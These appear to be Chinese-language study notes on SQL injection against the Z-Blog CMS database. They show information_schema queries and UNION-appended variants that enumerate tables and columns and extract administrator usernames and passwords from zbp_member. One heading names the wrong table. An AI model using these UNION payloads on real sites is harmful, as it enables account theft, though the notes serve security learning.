MySQL数据库架构&SQL注入漏洞

查找zblog数据库中有哪些表

SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.`TABLES` WHERE TABLE_SCHEMA='zblog';

查找目标表（zbp_category）中的字段

SELECT 6,COLUMN_NAME FROM information_schema.`COLUMNS` WHERE TABLE_NAME='zbp_member';

查找目标表中的目标数据（管理员用户名和密码）

SELECT mem_name,mem_password FROM zblog.zbp_member;

将代码中的可变量的SQL语句复制到数据库中

使用UNION语句替换掉原有查询结果，显示zblog数据库中的所有表。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.`TABLES` WHERE TABLE_SCHEMA='zblog';

使用UNION语句替换掉原有查询结果，显示zpb_member表中的所有字段。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT 6,COLUMN_NAME FROM information_schema.`COLUMNS` WHERE TABLE_NAME='zbp_member';

使用UNION语句替换掉原有查询结果，显示zpb_member表中的用户名和密码数据。

SELECT log_Title,log_Content FROM zblog.`zbp_post` WHERE log_CateID=3

UNION

SELECT mem_name,mem_password FROM zblog.zbp_member;